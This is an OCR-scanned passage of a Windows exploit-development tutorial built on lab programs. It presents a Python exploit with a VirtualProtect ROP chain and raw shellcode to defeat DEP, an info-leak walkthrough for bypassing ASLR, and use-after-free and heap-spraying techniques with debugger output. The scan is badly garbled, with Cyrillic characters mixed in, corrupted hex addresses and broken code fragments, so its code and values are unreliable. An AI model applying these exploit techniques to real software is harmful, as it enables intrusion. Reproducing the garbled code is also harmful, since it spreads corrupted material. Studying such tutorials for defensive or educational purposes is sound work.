Looking for 2Aa3 in pattern of 500000 bytes 
Looking for ЗаА2 in pattern of 500000 bytes 


- Pattern 3aA2 not found in cyclic pattern (uppercase) 


Looking for 2Aa3 in pattern of 500000 bytes 
Looking for ЗаА2 in pattern of 500000 bytes 


- Pattern 3aA2 not found in cyclic pattern (lowercase) 


[+] This топа.ру action took 0:00:00.180000 





Now that we know that ће offset is 8, we can reuse the script we used before to defeat DEP. We just need 
to make some minor modification and to remember to update the base addresses for я 


апа 
Here's the full script: 
Python 


import struct 


# The signature of VirtualProtect is the following: 
4 BOOL WINAPI VirtualProtect( 

In LPVOID IpAddress, 

_In_ SIZE_T dwSize, 

_In_ DWORD flNewProtect, 

Out PDWORD IpflOldProtect 

) 


# After PUSHAD is executed, the stack looks like this: 


EDI (ptr to ROP NOP (RETN)) 

ESI (ptr to JMP [EAX] (ЕАХ = address of ptr to VirtualProtect)) 
EBP (ptr to POP (skips EAX on the stack)) 

ESP (lpAddress (automatic)) 

EBX (dwSize) 

EDX (NewProtect (0x40 = PAGE_EXECUTE_READWRITE)) 
ECX (lpOldProtect (ptr to writeable address)) 

EAX (address of ptr to VirtualProtect) 

# lpAddress: 

# ptrto "call esp" 

# <shellcode> 


4. 
4. 
+ 
E 
+ 
# 
# 
E 
# 
E 
E 


20 = 0x6c9f0000 
32 = 0х76320000 
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= 0x770c0000 


create_rop_chain(): 
= охи fff 


zl 
* Oxbf868, 
* Oxbf868, 


msvcr120 + 0х1с658, 
0x11110511, 

* Oxdb6c4, 
Oxeeeefeef, 
Y r120 * 0x46398, 


msvcr120 + Oxbedae, 
0х01010141, 

=> (01/5165, 
Oxfefefeff, 
m 120 + 0x39b41, 


120 + Oxdb6c4, 
+ OxeOfce, 
+ 0х75623, О 
20 + 0x68e3d, 
20 + Охбе150, 
+ 0x2e8ae, 
+ 0х50464, 
+ Охе51а4, 
+ Oxbb7f9, 
+ 0х37133, 


ef write file(fil 


* 0xb7805) 
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"\x5c\x30\x78\x85\xdb\x74\x44\x8b\x4c\x33\x0c\x03\xcelxe8\x96\xff" + 
"\xff\xffix8b\x4c\x33\x20\x89\x45\xf8\x03\xce\x33\xcO\x89\x4d\xfO" + 
"\x89\x45\xfc\x39\x44\x33\x18\x76\x22\x8b\x0c\x81\x03\xce\xe8\x75" + 
"\xff\xff\xffix03\x45\xf8\x39\x45\xf4\x74\x1e\x8b\x45\xfc\x8b\x4d" + 
"\xfO\x40\x89\x45\xfe\x3b\x44\x33\x1 8\x72\xde\x3b\x7d\xec\x75\x9c" + 
"\x33\xcO\x5fix5e\x5b\x8b\xe5\x5d\xc3\x8b\x4.d\xfc\x8b\x44\x33\x24" + 


"\x8d\x04\x48\xO0fxb7\x0c\x30\x8b\x44\x33\x1 clx8d\x04\x88\x8b\x04" + 
"\x30\x03\xc6\xeb\xdd") 
name = 'a'*32 + readable + 'a'*8 + ret eip + create rop chain() + shellcode 
f.write(name) 





write_file(r'c:\name.dat’) 


и 


Кип the script and then run and exit from it by typing 
correctly, the calculator should pop up. We did it! 


at the prompt. If you did everything 


Exploiting the info leak 


Now let's assume we don't know the base addresses of | and and that we 
want to determine them by relying on alone (so that we could do that even from a remote PC 
if was offered as a remote service). 


From the source code of , we can see that pir initially points to the beginning of the array 
C++ 
class Name { 


char name[32]; 
int *ptr; 


public: 
Name() : ptr((int пате) {} 
<snip> 





, 


We want to read the pointer to the VFTable, but even if we can control and read wherever we want, we 
don't know the address of . A solution is that of performing a . Welll just overwrite the 
least significant byte of 


Python 


(Isb): 
h ореп(г'с\пате.даї, мб') as f: 
name = 'a'*32 + chr(Isb) 
f.write(name) 





write file(0x80) 


If the initial value of ptr was , after the overwrite, is equal to . Now let's run 
(directly, without WinDbg): 
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Reading name from file... 


Hi, aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaC"' 8! 


0х01142148 0х00000000 Охбсасеобо 0х0000000Ь 0х0026187с 0х00000021 0хо0261924 Ох 
6ca0a0d5] 


Do you want to read the name again? [y/n] 





As we can see, the first 8 dwords starting from the address indicated by ptr are 


0х01142148 0х00000000 Охбсасе060 0х0000000Ь 0х0026187с 0х00000021 0х00261924 Охбса0а0495 


There's no trace of the “а“$ (0x61616161) we put т the buffer name, so we must keep searching. Let's try 
with 0x60: 


write file(0x60) 


After updating name.dat, press 'y' in the console of exploitme4.exe and look at the portion of memory 
dumped. Since exploitme4.exe shows 0x20 bytes at a time, we can increment or decrement ptr by 0x20. 
Let's try other values (keep pressing ‘у’ in the console after each update of the Ше name.dat): 
write file(0x40) 
write file(0x20) 
write file(OxOO) 
write file(0xaO) 
) 


write file(OxcO 





The value 0xcO does the trick: 


Reading name from file... 

Ні, аааааааааааааааааааааааааааааааа L8! 

0x00000000 0x0026f8cc 0х011421а0 0х61616161 0x61616161 0x61616161 0x61616161 Ох 
61616161] 


Do you want to read the name again? [y/n] 





It's clear that 0x011421a0 is the pointer to the VF Table. Now let's read the contents of the VF Table: 
Python 


= 'а*32 + strui 


ne) 
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file(0x011421a0) 


By pressing ‘у’ again in the console, we see the following: 


Reading пате from file... 

Hi, aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaáMO o! 

0x01141000 0x01141020 0x00000048 0x00000000 0x00000000 0x00000000 0x00000000 0x 
00000000] 


Do you want to read the пате again? [у/п] 





The two pointers to the virtual functions are 0x01141000 and 0x01141020. We saw that the RVA to the first 
one is 0x1000, therefore the base address of exploitme4 is 


0:000» ? 01141000 - 1000 
Evaluate expression: 18087936 - 01140000 





Now it's time to use what we know about the IAT of exploitme4.exe: 


@exploitme4 + 00002000  kernel32 + 00014a25 
@exploitme4 + 00002004  ntdll + 00039dd5 
@exploitme4 + 00002024 msvcri20 + 000a4ced 





Because we've just found out that the base address of exploitme4.exe is 0х01140000, we can write 


@0х1142000  kernel32 + 00014225 
@0x1142004  ntdll + 00039445 
@0x1142024  msvcr120 + 000a4ced 





Let's overwrite ptr with the first address: 
write file(Ox1142000) 
By pressing ‘у' in the console we get: 


Reading name from file... 


Hi, аааааааааааааааааааааааааааааааа! 


0х76334а25 0х7 7019dd5 0x763334c9 0x76331420 0x763311f8 0x763316f1 0x7710107b Ox 
763351fd] 
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Do you want to read the name again? [y/n] 


We get two values: 0x76334a25 and 0х77019995. 


We need the last one: 
write file(0x1142024) 
By pressing ‘у’ in the console we get: 


Reading пате from file... 


Hi, aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaas Jo c! 


Охбса94сеа ОхбсабЪЬ8а Охбса1е25 Охбса1стсе 0хбса24293 0x6ca6bbb8 0хбса24104 Ох 
6ca955eb] 


Do you want to read the name again? [y/n] 





The final value is 0x6ca94ced. 


бо ме һауе 


(00x1142000  kernel32 + 00014a25 = 0x76334a25 
@0х1142004 та» 00039dd5 = 0x770f9dd5 
@0x1142024 тѕусг120 + 000a4ced = Охбса94сеа 





Тћегетоге, 


kernel32 = 0x76334a25 - 0x00014a25 = 0x76320000 
ntdll = 0х770 9995 - 0x00039dd5 = 0x770c0000 


msvcr120 = Охбса94сеч - 0x000a4ced 540) (оте >) 10101010) 





Congratulations! We have just bypassed ASLR! 


Of course, all this process makes sense when we have remote access to the program but not to the 
machine. Moreover, in an actual exploit all this can and need to be automated. Here, Гт just trying to show 
you the principles and therefore l've willingly omitted any superflous details which would've complicated 
matters without adding any real depth to your comprehension. Don't worry: when we deal with Internet 
Explorer we'll see a real exploit in all its glory! 
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If you haven't already, read the previous articles (I, 
For this example you'll need to disable . In 
configuration for as follows: 


. Configuration Properties 
о Linker 
. Advanced 


The source code of 
С++ 


is the following: 


#include <conio.h> 
#include <cstdio> 
#include <cstdlib> 
#include <vector> 


| std; 
const bool printAddresses = 
class Mutator ( 
protected: 


int param; 


public: 
Mutator(int param) : param(param) {} 


virtual int getParam() const ( 
param; 
) 


virtual void mutate(void *data, int size) const = 0; 


Қ 


class Multiplier: public Mutator { 
int reserved[40]; 


public: 
Multiplier(int multiplier = 0) : Mutator(multiplier) {} 


virtual void mutate(void *data, int size) const ( 
int *ptr = (int *)data; 
(int i = 0; i < size / 4; ++i) 
ptr[i] “= getParam(); 
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s LowerCaser : public Mutator { 
LowerCaser() : Mutator(0) {} 


, int size 


void "заран; ) c nst 
int getSize() ) const { 


vector<Block> blocks; 
Mutator *mutators[] = { new Multiplier(2), new LowerCaser( 


| БОП! ОЦЕ utator() 4 


> >getParam()); 
int t choice = = отд. 
ERR. 

( ones =: 


if choice шш! 
if ( (printAddresses) 
. printf("r 'mut = 0x%08x\n", mutators[0]); 
е mutators[ 


in J", &multiplier); 
fflush(stdin); 
if (res) { 
mutators[0] = new Multiplier(multiplier); 
if (printAddresses) 
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t configurable for no\ 


г (size_t i = 0; i < blocks.size() 
printf("l | 
printf("------ 


void readBlock() { 
cnar “даїа: 
сћаг НеРа [1024]; 


<it")) 


FILE {= ES (filePath, "rb"); 
if (f) 
printf("Can't open the fil 


векі, 0L, SEEK END); 
т =  ftell(f); 
dt - new char[bytes]; 


fseek(f, OL, SEEK SET); 


2. pos > ‚200 2 200 : bytes - pos; 
fread(data * pos, 1, len, f); 


pos += len; 
1 


fclose(f); 


blocks.push back(Block(data, bytes)); 


рип ("Воск read (96d bytes)", bytes); 


br 
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| duplicateBlock() | 
мВт ); 


int index; 
scanf 5("%4 
ше (stdi 


scanf_s("%c 
fflush(stdin); 
if Е == -1) 


it i = 0; i < copies; ++i) { 
t size =  blocks{index] ЦАГТ 


void *data = ne ar[size]; 
memopy(data, blocks[index].getData(), ), Size); 
blocks.push back(Block(data, size)); 


гоіа myExit() { 
exit(0); 


oid mutateBlock() { 
listBlocks(); 


printf(" 
int index; 


(int)blocks.size()) { 
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ПП 
printf(^nW 
if (choice = 


blocks[index].getData(), blocks[index].getSize 


) 
1) 


int main() ( 
typed id(*funcPtr)(); 
funcPtr functions[] = ( readBlock, listBlocks, duplicateBlock, configureMutator, mutateBlock, myExit ); 
nt choice = handleMenu(); 
functions[choice - 1](); 
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This program is longer than the previous ones, so let’s talk a little about it. This program lets you: 


1: read а block of data from file; 
2. duplicate a block by doing copies of it; 
3. transform a block by doing some operations on it. 


You can transform a block by using a mutator. There are just two mutators: the first is called Multiplier and 
multiplies the dwords in a block by a multiplier, whereas the second is called LowerCaser and simply 
trasform ASCII characters to lowercase. 


The Multiplier mutator can be configured, i.e. the multiplier can be specified by the user. 


UAF 
This program has a bug of type UAF (Use After Free). Here’s an example of a UAF bug: 


C++ 
Object *obj = new Object; 


obj; 





obj->method(); 


As you can see, obj is used after it's been freed. The problem is that in C++, objects must be freed manually 
(there is no garbage collector) so, because of a programming error, an object can be freed while it’s still in 
use. After the deallocation, obj becomes а so-called dangling pointer because it points to deallocated data. 


How сап ме exploit such а bug? The idea is to take control of the portion of memory pointed to by the 
dangling pointer. To understand how we can do this, we need to know how the memory allocator works. We 
talked about the Windows Heap in the Heap section. 


In a nutshell, the heap maintains lists of free blocks. Each list contains free blocks of a specific size. For 
example, if we need to allocate a block of 32 bytes, a block of 40 bytes is removed from the appropriate list 
of free blocks and returned to the caller. Note that the block is 40 bytes because 8 bytes are used for the 
metadata. When the block is released by the application, the block is reinserted into the appropriate list of 
free blocks. 


Here comes the most important fact: when the allocator needs to remove a free block from a free list, it 
tends to return the last free block which was inserted into that list. This means that if an object of, say, 32 
bytes is deallocated and then another object of 32 bytes is allocated, the second object will occupy the same 
portion of memory that was occupied by the first object. 


Let’s look at an example: 
С++ 





Object *obj = new Object; 
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lelete obj; 
Object *obj2 = new Object; 





obj->method(); 


In this example, obj and obj2 will епа ир pointing to the same object because the Боск of memory released 
by delete is immediately returned by the following new. 


What happens if instead of another object we allocate an array of the same size? Look at this example: 
С++ 

Object *obj = new Object; 

delete obj; 


int *data = new int[32/4]; 
data[0] = ptr to evil VFTable; 





obj->virtual_method(); 


As we saw before when we exploited exploitme4, the first DWORD of an object which has a virtual function 
table is a pointer to that table. In the example above, through the UAF bug, we are able to overwrite the 
pointer to the VF Table with a value of our choosing. This way, obj-»virtual method() may end up calling our 
payload. 


Heap Spraying 

To spray the heap means filling the heap with data we control. In browsers we can do this through 
Javascript by allocating strings or other objects. Spraying the heap is a way to put our shellcode in the 
address space of the process we're attacking. Let's say we succeed in filling the heap with the following 
data: 


nop 


shellcode 


nop 


nop 





nop 
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nop 


shellcode 


(and so on) 





Even if the allocations on the Heap are not completely deterministic, if we put enough data on the heap, and 
the are long enough with respect to our shellcode, it's highly probable that by jumping at a specific 
address on the heap we'll hit a nop sled and our shellcode will be executed. 


By studying how the heap behaves, we can even perform precise heap spraying, so that we don't need any 
nop sleds. 


UAF in exploitme5 
The UAF bug is located in the function. Here's the code again: 


С++ 


void configureMutator() ( 
hile (true) ( 
printf( 
"1) Multiplier (multiplier = %d)\n" 
"2) LowerCaser\n" 
"3) Exit\n" 
Шү 
"Your choice [1-3]: ", mutators[0]->getParam()); 
int choice =  getch(); 
printf("\n\n"); 
if (choice == '3') 


if (choice >= '1' && choice <= '3') { 
(choice == '1') { 
f (printAddresses) 
printf("mutators[0] = 0х%08х\п", mutators[0]); 
te mutators[0]; 


printf(" multiplier (int): "); 

int multiplier; 

int res = scanf_s("%d", &multiplier); 

fflush(stdin); 

f (res) ( 
mutators[0] = new Multiplier(multiplier); < only if res is 
if (printAddresses) 
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mutators[0]); 


"ү. 


Look а the two remarks т the code above. This function lets us change the multiplier used by the 
mutator, but if we enter an invalid value, for instance “ | returns false and becomes 


a dangling pointer because still points to the destroyed object. 


Here's the definition of (and its base class ): 


utator { 
ed: 


Mutator(int param) : param(param) {} 


int getParam() const { 
лт param; 


jid mutate(void *data, int size) const = 0; 
s Multiplier: public Mutator { 


t reserved[40]; 


public: 
Multiplier(int multiplier = 0) : Mutator(multiplier) {} 


) 
у 


V jid mutate(void *data, int size) const ( 
int *ptr = (int *)data; 
for (int i = 0; i < size / 4; ++i) 


The size of is: 


bytes reason 
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VFTable ptr 


"param" property 


"reserved" property 


168 bytes 





So if we allocate a block of bytes, the allocator will return to us the block which is still pointed to by 


. How do we create such a block? We can use the option , but it might not 
work because is called before the new block is allocated. This may cause problems because 
calls the allocator internally. Here’s the code for 


C++ 


void readBlock() { 
char *data; 
char filePath[1024]; 


/hile (true) ( 
printf(" "File path ('exit' to exit): "); 
scanf_s("%s", filePath, sizeof(filePath)); 
fflush(stdin); 
printf("\n"); 
(Istremp(filePath, "exit")) 


FILE Ч = fopen(filePath, "rb"); 
(9) 
printf("Can't open the file! n"); 


{ 
fseek(f, OL, SEEK_END); 
long bytes = ftell(f); 
data = char[bytes]; 


fseek(f, OL, SEEK_SET); 
int pos = 0; 
(pos « bytes) ( 
int len = bytes - pos > 200 2 200 : bytes - pos; 
fread(data + pos, 1, len, f); 
pos += len; 
) 


fclose(f); 


blocks.push_back(Block(data, bytes)); 


printf("Block read (%d bytes)\n\n", bytes); 
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For convenience, the code prints the addresses of the deallocated Multiplier (mutators[0]) and of the 


allocated blocks (in listBlocks()). 


Let’s try to exploit the UAF bug. First let’s create a file of 168 bytes with the following Python script: 


Рућоп 


with open(r'd:Xobj.dat', мр") as f: 





f.write('a* 168) 


Now let's run exploitme5: 


1) Read block from file 
2) List blocks 
3) Duplicate Block 
4) Configure mutator 
5) Mutate block 

) 


6) Exit 
Your choice [1-6]: 4 


1) Multiplier (multiplier = 2) 
2) LowerCaser 

3) Exit 

Your choice [1-3]: 1 
mutators[0] = 0x004fc488 deallocated block 
multiplier (int): asdf 

1) Read block from file 

2) List blocks 


3) Duplicate Block 


4) Configure mutator 


5) Mutate block 
6) Exit 


) 
) 
) 
) 
) 
) 
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Your choice [1-6]: 1 
File path ('exit' to exit): d:\obj.dat 
Block read (168 bytes) 


1) Read block from file 
2) List blocks 
3) Duplicate Block 
4) Configure mutator 
5) Mutate block 

) 


6) Exit 


Your choice [1-6]: 2 


allocated block 


1) Read block from file 
2) List blocks 
3) Duplicate Block 
4) Configure mutator 
5) Mutate block 

) 


6) Exit 


Your choice [1-6]: 





As you can see, the new block was allocated at the same address of the deallocated mutator. This means 
that we control the contents of the memory pointed to by mutators[0]. 


This seems to be working, but a better way would be to 
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4: 
2. ---» UAF bug 
3 


This is more reliable because allocate a new block right away without calling other 
dangerous functions before: 


C++ 


void duplicateBlock() { 

listBlocks(); 
hile (true) ( 
printf("Index of block to duplicate (-1 to exit): "); 
int index; 
scanf_s("%d", &index); 
fflush(stdin); 

(index == -1) 


f (index < 0 || index >= (int)blocks.size()) 4 
printf( Wrong index!\n"); 
) 


(true) ( 
int copies; 
printf(" Number of copies (-1 to exit): "); 
scanf_s("%d", &copies); 
fflush(stdin); 
f (copies == -1) 


| (соріев <- 0) 
printf("Wrong number of copies!\n"); 


r (int i = 0; i < copies; ++i) { 

int size = blocks[index].getSize(); 

void “data = new char[size]; 

memcpy(data, blocks[index].getData(), size); 
blocks.push back(Block(data, size)); 





Let's try also this second method: 


1) Read block from file 
2) List blocks 


3) Duplicate Block 
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4) Configure mutator 
5) Mutate block 
6) Exit 


Your choice [1-6]: 1 


File path ('exit' to exit): d:\obj.dat 


Block read (168 bytes) 


1) Read block from file 


2) List blocks 


4) Configure mutator 
5) Mutate block 
6) Exit 


) 
) 
3) Duplicate Block 
) 
) 
) 


Your choice [1-6]: 4 


1) Multiplier (multiplier = 2) 
2) LowerCaser 
3) Exit 


Your choice [1-3]: 1 


mutators[0] = 0x0071c488 
multiplier (int): asdf 
1) Read block from file 
2) List blocks 
3) Duplicate Block 
4) Configure mutator 

) 


5) Mutate block 





6) Exit 


Your choice [1-6]: 3 


Index of Боск to duplicate (-1 to exit): 0 
Number of copies (-1 to exit): 1 

1) Read block from file 
2) List blocks 

3) Duplicate Block 

4) Configure mutator 
5) Mutate block 

) 


6) Exit 


Your choice [1-6]: 2 


block 0: address = 0х0071с538; size = 168 
block 1: address = 0х0071с488; size = 168 < 


1) Read block from file 
2) List blocks 


3) Duplicate Block 


4) Configure mutator 


5) Mutate block 
6) Exit 


) 
) 
) 
) 
) 
) 


Your choice [1-6]: 
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This works as well, of course. 


Heap Spraying in eploitme5 
We can spray the heap by reading a big block from file and then making many copies of it. Let’s try to 
allocate blocks of 1 MB. We can create the file with this script: 


Python 


vith open(r'd:\buf.dat', мБ") as f: 





f.write('a*0x100000) 


Note that 0x100000 is 1 MB in hexadecimal. Let's open exploitme5 in WinDbg and run it: 


1) Read block from file 
2) List blocks 
3) Duplicate Block 
4) Configure mutator 
5) Mutate block 

) 


6) Exit 

Your choice [1-6]: 1 

File path ('exit' to exit): d:\buf.dat 
Block read (1048576 bytes) 


1) Read block from file 
2) List blocks 
3) Duplicate Block 
4) Configure mutator 
5) Mutate block 

) 


6) Exit 


Your choice [1-6]: 3 
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block 0: address = 0x02070020; size = 1048576 


Index of block to duplicate (-1 to exit): 0 
Number of copies (-1 to exit): 200 

1) Read block from file 

2) List blocks 


3) Duplicate Block 


4) Configure mutator 


) 
) 
) 
) 
5) Mutate block 
6) Exit 


Your choice [1-6]: 2 


block 0: address = 0х02070020; size = 1048576 
block 1: address = 0х02270020; size = 1048576 
block 2: address = 0х02380020; size = 1048576 
block 3: address = 0x02490020; size = 1048576 
block 4: address = 0х025а0020; size = 1048576 
block 5: address = 0х02650020; size = 1048576 
block 6: address = 0x027c0020; size = 1048576 
block 7: address = 0x028d0020; size = 1048576 
block 8: address = 0х029е0020; size = 1048576 
block 9: address = 0х02а#0020; size = 1048576 
block 10: address = 0х02с00020; size = 1048576 
block 11: address = 0х024910020; size = 1048576 
block 12: address = 0х02е20020; size = 1048576 
block 13: address = 0х02130020; size = 1048576 
block 14: address = 0х03040020; size = 1048576 
block 15: address = 0х03150020; size = 1048576 
block 16: address = 0х03260020; size = 1048576 
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block 17: 
block 18: 
block 19: 
block 20: 
block 21: 
block 22: 
block 23: 
block 24: 
block 25: 
block 26: 
block 27: 
block 28: 
block 29: 
block 30: 
block 31: 
block 32: 
block 33: 
block 34: 
block 35: 
block 36: 
block 37: 
block 38: 
block 39: 
Боск 40: 
block 41: 
block 42: 
Боск 43: 
block 44: 
block 45: 
block 46: 
block 47: 
block 48: 


address = 0х03370020; size = 1048576 
address = 0x03480020; size = 1048576 
address = 0x03590020; size = 1048576 
address = 0x036a0020; size = 1048576 
address = 0х03760020; size = 1048576 
address = 0x038c0020; size = 1048576 
address = 0x039d0020; size = 1048576 
address = 0х03ае0020; size = 1048576 
address = 0х03р10020; size = 1048576 
address = 0х03400020; size = 1048576 
address = 0х03е10020; size = 1048576 
address = 0x03f20020; size = 1048576 
address = 0х04030020; size = 1048576 
address = 0x04140020; size = 1048576 
address = 0x04250020; size = 1048576 
address = 0x04360020; size = 1048576 
address = 0x04470020; size = 1048576 
address = 0х04580020; size = 1048576 
address = 0x04690020; size = 1048576 
address = 0x047a0020; size = 1048576 
address = 0х048р0020; size = 1048576 
address = 0x049c0020; size = 1048576 
address = 0x04ad0020; size = 1048576 
address = 0x04be0020; size = 1048576 
address = 0х04с10020; size = 1048576 
address = 0х04е00020; size = 1048576 
address = 0x04f10020; size = 1048576 
address = 0x05020020; size = 1048576 
address = 0x05130020; size = 1048576 
address = 0x05240020; size = 1048576 
address = 0x05350020; size = 1048576 
address = 0х05460020; size = 1048576 
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block 49: 
block 50: 
block 51: 
block 52: 
block 53: 
Боск 54: 
block 55: 
Боск 56: 
block 57: 
block 58: 
block 59: 
block 60: 
block 61: 
block 62: 
block 63: 
block 64: 
block 65: 
block 66: 
block 67: 
block 68: 
block 69: 
block 70: 
block 71: 
block 72: 
block 73: 
block 74: 
block 75: 
block 76: 
block 77: 
block 78: 
block 79: 
block 80: 


address = 0х05570020; size = 1048576 
address = 0х05680020; size = 1048576 
address = 0x05790020; size = 1048576 
address = 0х058а0020; size = 1048576 
address = 0х05960020; size = 1048576 
address = 0х05ас0020; size = 1048576 
address = 0х05640020; size = 1048576 
address = 0х05се0020; size = 1048576 
address = 0х05010020; size = 1048576 
address = 0х05100020; size = 1048576 
address = 0х06010020; size = 1048576 
address = 0x06120020; size = 1048576 
address = 0x06230020; size = 1048576 
address = 0x06340020; size = 1048576 
address = 0x06450020; size = 1048576 
address = 0х06560020; size = 1048576 
address = 0x06670020; size = 1048576 
address = 0x06780020; size = 1048576 
address = 0x06890020; size = 1048576 
address = 0x069a0020; size = 1048576 
address = 0х06ар0020; size = 1048576 
address = 0x06bc0020; size = 1048576 
address = 0х06са0020; size = 1048576 
address = Охобае0020; size = 1048576 
address = 0x06ef0020; size = 1048576 
address = 0х07000020; size = 1048576 
address = 0х07110020; size = 1048576 
address = 0х07220020; size = 1048576 
address = 0x07330020; size = 1048576 
address = 0x07440020; size = 1048576 
address = 0х07550020; size = 1048576 
address = 0х07660020; size = 1048576 
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block 81: address = 0x07770020; size = 1048576 
block 82: address = 0x07880020; size = 1048576 
block 83: address = 0x07990020; size = 1048576 
block 84: address = 0x07aa0020; size = 1048576 
block 85: address = 0х07660020; size = 1048576 
block 86: address = 0х07сс0020; size = 1048576 
block 87: address = 0x07dd0020; size = 1048576 
block 88: address = 0x07ee0020; size = 1048576 
block 89: address = 0x07ff0020; size = 1048576 
block 90: address = 0x08100020; size = 1048576 
block 91: address = 0x08210020; size = 1048576 
block 92: address = 0x08320020; size = 1048576 
block 93: address = 0x08430020; size = 1048576 
block 94: address = 0x08540020; size = 1048576 
block 95: address = 0x08650020; size = 1048576 
block 96: address = 0x08760020; size = 1048576 
block 97: address = 0x08870020; size = 1048576 
block 98: address = 0x08980020; size = 1048576 
block 99: address = 0x08a90020; size = 1048576 
block 100: address = 0x08ba0020; size = 1048576 
block 101: address = 0х08с60020; size = 1048576 
block 102: address = 0x08dc0020; size = 1048576 
block 103: address = 0x08ed0020; size = 1048576 
block 104: address = 0x08fe0020; size = 1048576 
block 105: address = 0х09010020; size = 1048576 
block 106: address = 0x09200020; size = 1048576 
block 107: address = 0x09310020; size = 1048576 
block 108: address = 0x09420020; size = 1048576 
block 109: address = 0x09530020; size = 1048576 
block 110: address = 0x09640020; size = 1048576 
block 111: address = 0x09750020; size = 1048576 
block 112: address = 0x09860020; size = 1048576 
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block 113: address = 0x09970020; size = 1048576 
block 114: address = 0x09a80020; size = 1048576 
block 115: address = 0х09690020; size = 1048576 
block 116: address = 0x09ca0020; size = 1048576 
block 117: address = 0х09460020; size = 1048576 
block 118: address = 0x09ec0020; size = 1048576 
block 119: address = 0х09#0020; size = 1048576 
block 120: address = 0х0а0е0020; size = 1048576 
block 121: address = 0x0a1f0020; size = 1048576 
block 122: address = 0x0a300020; size = 1048576 
block 123: address = 0x0a410020; size = 1048576 
block 124: address = 0x0a520020; size = 1048576 
block 125: address = 0x0a630020; size = 1048576 
block 126: address = 0x0a740020; size = 1048576 
block 127: address = 0x0a850020; size = 1048576 
block 128: address = 0x0a960020; size = 1048576 
block 129: address = Ох0аа70020; size = 1048576 
block 130: address = 0x0ab80020; size = 1048576 
block 131: address = Ох0ас90020; size = 1048576 
block 132: address = Ох0ада0020; size = 1048576 
block 133: address = Охоаеб0020; size = 1048576 
block 134: address = Ох0аїс0020; size = 1048576 
block 135: address = 0х06090020; size = 1048576 
block 136: address = 0х061е0020; size = 1048576 
block 137: address = 0х06210020; size = 1048576 
block 138: address = 0х06400020; size = 1048576 
block 139: address = 0x0b510020; size = 1048576 
block 140: address = 0x0b620020; size = 1048576 
block 141: address = 0x0b730020; size = 1048576 
block 142: address = 0x0b840020; size = 1048576 
block 143: address = 0x0b950020; size = 1048576 
block 144: address = 0x0ba60020; size = 1048576 
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block 145: address = 0х066 70020; size = 1048576 
block 146: address = 0х06с80020; size = 1048576 
block 147: address = 0x0bd90020; size = 1048576 
block 148: address = Ох0беа0020; size = 1048576 
block 149: address = 0х06#0020; size = 1048576 
block 150: address = 0х0с0с0020; size = 1048576 
block 151: address = 0х0с140020; size = 1048576 
block 152: address = 0х0с2е0020; size = 1048576 
block 153: address = 0х0с3ї0020; size = 1048576 
block 154: address = 0х0с500020; size = 1048576 
block 155: address = 0х0с610020; size = 1048576 
block 156: address = 0х0с720020; size = 1048576 
block 157: address = 0х0с830020; size = 1048576 
block 158: address = 0х0с940020; size = 1048576 
block 159: address = Ох0са50020; size = 1048576 
block 160: address = 0x0cb60020; size = 1048576 
block 161: address = 0х0сс70020; size = 1048576 
block 162: address = 0х0са80020; size = 1048576 
block 163: address = 0x0ce90020; size = 1048576 
block 164: address = Ох0сѓа0020; size = 1048576 
block 165: address = 0х04060020; size = 1048576 
Боск 166: address = 0x0d1c0020; size = 1048576 
block 167: address = 0x0d2d0020; size = 1048576 
block 168: address = 0x0d3e0020; size = 1048576 
block 169: address = 0x0d4f0020; size = 1048576 
block 170: address = 0х00600020; size = 1048576 
block 171: address = 0x0d710020; size = 1048576 
block 172: address = 0x0d820020; size = 1048576 
block 173: address = 0x0d930020; size = 1048576 
block 174: address = 0x0da40020; size = 1048576 
block 175: address = 0х04650020; size = 1048576 
block 176: address = 0х00с60020; size = 1048576 
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block 177: address = 0x0dd70020; size = 1048576 
block 178: address = 0х00е80020; size = 1048576 
block 179: address = 0х04190020; size = 1048576 
block 180: address = 0х0е0а0020; size = 1048576 
block 181: address = 0х0е160020; size = 1048576 
block 182: address = 0x0e2c0020; size = 1048576 
block 183: address = 0х0е3а0020; size = 1048576 
block 184: address = 0х0е4е0020; size = 1048576 
block 185: address = 0х0е510020; size = 1048576 
block 186: address = 0х0е700020; size = 1048576 
block 187: address = 0x0e810020; size = 1048576 
block 188: address = 0x0e920020; size = 1048576 
block 189: address = 0x0ea30020; size = 1048576 
block 190: address = 0x0eb40020; size = 1048576 
block 191: address = 0х0ес50020; size = 1048576 
block 192: address = 0x0ed60020; size = 1048576 
block 193: address = 0x0ee70020; size = 1048576 
block 194: address = 0x0ef80020; size = 1048576 
block 195: address = 0х01090020; size = 1048576 
block 196: address = 0x0f1a0020; size = 1048576 
block 197: address = 0х01250020; size = 1048576 
block 198: address = 0x0f3c0020; size = 1048576 
block 199: address = 0x0f4d0020; size = 1048576 
block 200: address = 0х0#5е0020; size = 1048576 


Read block from file 
List blocks 


Duplicate Block 


Configure mutator 
Mutate block 
Exit 
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Your choice [1-6]: 





Now click on Debug—Break in WinDbg and inspect the heap: 


0:001» !heap 
NtGlobalFlag enables following debugging aids for new heaps: tail checking 
free checking 
validate parameters 
Index Address Name Debugging options enabled 
1: 00140000 tail checking free checking validate parameters 
2: 00650000 tail checking free checking validate parameters 
3: 01с80000 tail checking free checking validate parameters 
4: 01е10000 tail checking free checking validate parameters 
0:001» !heap -m m displays the segments 
Index Address Мате Debugging options enabled 
1: 00140000 
Segment at 00140000 to 00240000 (0002f000 bytes committed) 
2: 00650000 
Segment at 00650000 to 00660000 (00003000 bytes committed) 
3: 01c80000 
Segment at 01с80000 to 01290000 (0000c000 bytes committed) 
Segment at 01e50000 to 01f50000 (0001c000 bytes committed) 
4: 01e10000 
Segment at 01е10000 to 01е50000 (00001000 bytes committed) 





That's odd... where are our 200 MB of data? The problem is that when the Heap manager is asked to 
allocate a block whose size is above a certain threshold, the allocation reguest is sent directly to the Virtual 
Memory Manager. Let's have a look: 

0:001> !heap -s ("-s" stands for "summary") 

NtGlobalFlag enables following debugging aids for new heaps: 


tail checking 


free checking 


validate parameters 
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LFH Key : Охббсаб5ас 
Termination on corruption : ENABLED 
Heap Flags Reserv Commit Virt Free List UCR Virt Lock Fast 
(к) (к) (k) (k)length blocks cont. heap 


Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
